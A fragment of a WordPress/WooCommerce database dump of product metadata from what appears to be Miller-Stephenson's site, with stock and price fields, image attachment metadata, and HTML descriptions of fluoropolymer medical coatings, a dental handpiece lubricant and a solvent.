INSERT INTO `wp_postmeta` VALUES (3430, 468, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3431, 468, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3432, 468, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3433, 468, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3434, 468, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3435, 468, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3436, 468, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3437, 468, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3438, 468, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3439, 468, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3440, 468, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3441, 468, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3442, 468, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3443, 468, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3444, 468, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3445, 468, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3446, 468, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3447, 468, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3448, 468, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3449, 468, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3450, 468, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3451, 468, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3452, 468, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3453, 468, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3454, 468, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (3455, 468, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3456, 468, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3457, 468, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3458, 468, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3459, 468, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (3460, 469, '_edit_lock', '1498438440:3'); 
INSERT INTO `wp_postmeta` VALUES (3461, 469, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3463, 469, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3464, 469, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3465, 469, '312_default_editor', '<p class="Body"><strong><span class="C-12">Fluoropolymer Medical Coatings:</span></strong></p>\r\n<p class="Body"><span class="C-8">Our PTFE-<wbr />coatings are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology.  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements. Extremely Low coefficient of friction tested by <span class="C-14">ASTM 1894</span><span class="C-14">; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO 11070 Corrosion Resistance Test</span></span></p>\r\n<p class="Body"><strong><span class="C-12">Usage Recommendations:</span></strong></p>\r\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s Fluoropolymer coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>'); 
INSERT INTO `wp_postmeta` VALUES (3466, 469, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3467, 469, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3468, 469, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3469, 469, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3470, 469, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3471, 469, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3472, 469, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3473, 469, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3474, 469, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3475, 469, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3476, 469, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3477, 469, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3478, 469, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3479, 469, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3480, 469, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3481, 469, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3482, 469, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3483, 469, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3484, 469, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3485, 469, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3486, 469, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3487, 469, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3488, 469, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3489, 469, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3490, 469, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (3491, 469, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3492, 469, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3493, 469, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3494, 469, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3495, 469, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (3496, 469, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (3497, 473, '_edit_lock', '1473775838:3'); 
INSERT INTO `wp_postmeta` VALUES (3498, 473, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3499, 473, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3500, 473, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3501, 473, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3502, 473, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3503, 473, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3504, 473, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3505, 473, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3506, 473, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3507, 473, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3508, 473, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3509, 473, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3510, 473, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3511, 473, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3512, 473, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3513, 473, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3514, 473, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3515, 473, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3516, 473, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3517, 473, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3518, 473, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3519, 473, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3520, 473, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3521, 473, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3522, 473, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3523, 473, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3524, 473, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3525, 473, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3526, 473, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3527, 473, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3528, 473, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3529, 473, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3530, 473, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3531, 473, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (3532, 474, '_edit_lock', '1499353741:3'); 
INSERT INTO `wp_postmeta` VALUES (3533, 474, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3534, 474, '_thumbnail_id', '1291'); 
INSERT INTO `wp_postmeta` VALUES (3535, 474, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3536, 474, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3537, 474, '312_default_editor', '<img class="wp-image-1132 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/fluoroextreme-dental-e1472662665528.jpg" alt="fluoroextreme dental" width="469" height="391" />Pictured is a head-<wbr />to-<wbr />head evaluation of a popular hydrocarbon-based handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned,lubricated, sterilized then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from catastrophic breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the even lubricant itself resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nOn the contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise.The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, utilizing our proprietary fluorinated synthetic lubricant delivers substantially improved operation of your dental handpiece.  Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.'); 
INSERT INTO `wp_postmeta` VALUES (3538, 474, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3539, 474, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3540, 474, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3541, 474, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3542, 474, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3543, 474, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3544, 474, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3545, 474, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3546, 474, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3547, 474, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3548, 474, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3549, 474, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3550, 474, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3551, 474, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3552, 474, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3553, 474, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3554, 474, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3555, 474, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3556, 474, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3557, 474, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3558, 474, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3559, 474, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3560, 474, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3561, 474, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3562, 474, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (3563, 474, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3564, 474, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3565, 474, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3566, 474, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3567, 474, '_product_image_gallery', '141'); 
INSERT INTO `wp_postmeta` VALUES (3568, 473, '_thumbnail_id', '249'); 
INSERT INTO `wp_postmeta` VALUES (3569, 485, '_wp_attached_file', '2016/08/specialty-products.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3570, 485, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2336;s:6:"height";i:3504;s:4:"file";s:30:"2016/08/specialty-products.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"specialty-products-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"specialty-products-533x800.jpg";s:5:"width";i:533;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"specialty-products-768x1152.jpg";s:5:"width";i:768;s:6:"height";i:1152;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"specialty-products-1067x1600.jpg";s:5:"width";i:1067;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"specialty-products-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"specialty-products-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"specialty-products-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"specialty-products-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3571, 486, '_wp_attached_file', '2016/08/Epoxy-resins.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3572, 486, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3072;s:6:"height";i:2048;s:4:"file";s:24:"2016/08/Epoxy-resins.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Epoxy-resins-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"Epoxy-resins-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"Epoxy-resins-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"Epoxy-resins-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"Epoxy-resins-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"Epoxy-resins-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"Epoxy-resins-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"Epoxy-resins-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3573, 489, '_edit_lock', '1478960142:3'); 
INSERT INTO `wp_postmeta` VALUES (3574, 489, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3575, 489, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3576, 489, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3577, 489, '312_default_editor', '<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Safe for most plastics, elastomers and metals</li>\r\n 	<li>Noncorrosive</li>\r\n 	<li>Low toxicity, compared to alternative solvents</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<table width="399">\r\n<tbody>\r\n<tr>\r\n<td width="219">Boiling Point</td>\r\n<td style="text-align: center;" width="180">82°C</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density</td>\r\n<td style="text-align: center;">0.79 g/ml</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">33 mmHg</td>\r\n</tr>\r\n<tr>\r\n<td>Percent Volatile</td>\r\n<td style="text-align: center;">100%</td>\r\n</tr>\r\n<tr>\r\n<td>Water Content</td>\r\n<td style="text-align: center;">&lt;0.10%</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (3578, 489, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3579, 489, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3580, 489, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3581, 489, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3582, 489, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3583, 489, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3584, 489, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3585, 489, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3586, 489, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3587, 489, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3588, 489, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3589, 489, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3590, 489, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3591, 489, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3592, 489, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3593, 489, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3594, 489, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3595, 489, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3596, 489, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3597, 489, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3598, 489, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3599, 489, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3600, 489, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3601, 489, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3602, 489, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3603, 489, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3604, 489, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3605, 489, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3606, 489, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3607, 489, '_product_image_gallery', '1742,1741'); 
INSERT INTO `wp_postmeta` VALUES (3608, 490, '_edit_lock', '1472146730:3'); 
INSERT INTO `wp_postmeta` VALUES (3609, 490, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (3610, 490, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3611, 490, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3612, 490, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3613, 490, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (3614, 490, 'wc_productdata_options', 'a:1:{i:0;a:8:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";s:12:"_top_content";s:0:"";s:15:"_bottom_content";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3615, 490, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3616, 490, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3617, 490, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3618, 490, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3619, 490, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3620, 490, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3621, 490, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3622, 490, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3623, 490, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3624, 490, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3625, 490, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3626, 490, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3627, 490, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3628, 490, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3629, 490, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3630, 490, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3631, 490, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3632, 490, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3633, 490, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3634, 490, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3635, 490, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3636, 490, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3637, 490, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3638, 490, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3639, 490, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3640, 490, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3641, 490, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3642, 490, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (3643, 517, '_wp_attached_file', '2016/08/shutterstock_209155915.jpg'); 
INSERT INTO `wp_postmeta` VALUES (3644, 517, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4500;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/shutterstock_209155915.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_209155915-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_209155915-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_209155915-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_209155915-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_209155915-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_209155915-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_209155915-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_209155915-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (3645, 523, '_wp_attached_file', '2016/08/ReleaSys-Boat-hulls.jpg'); 
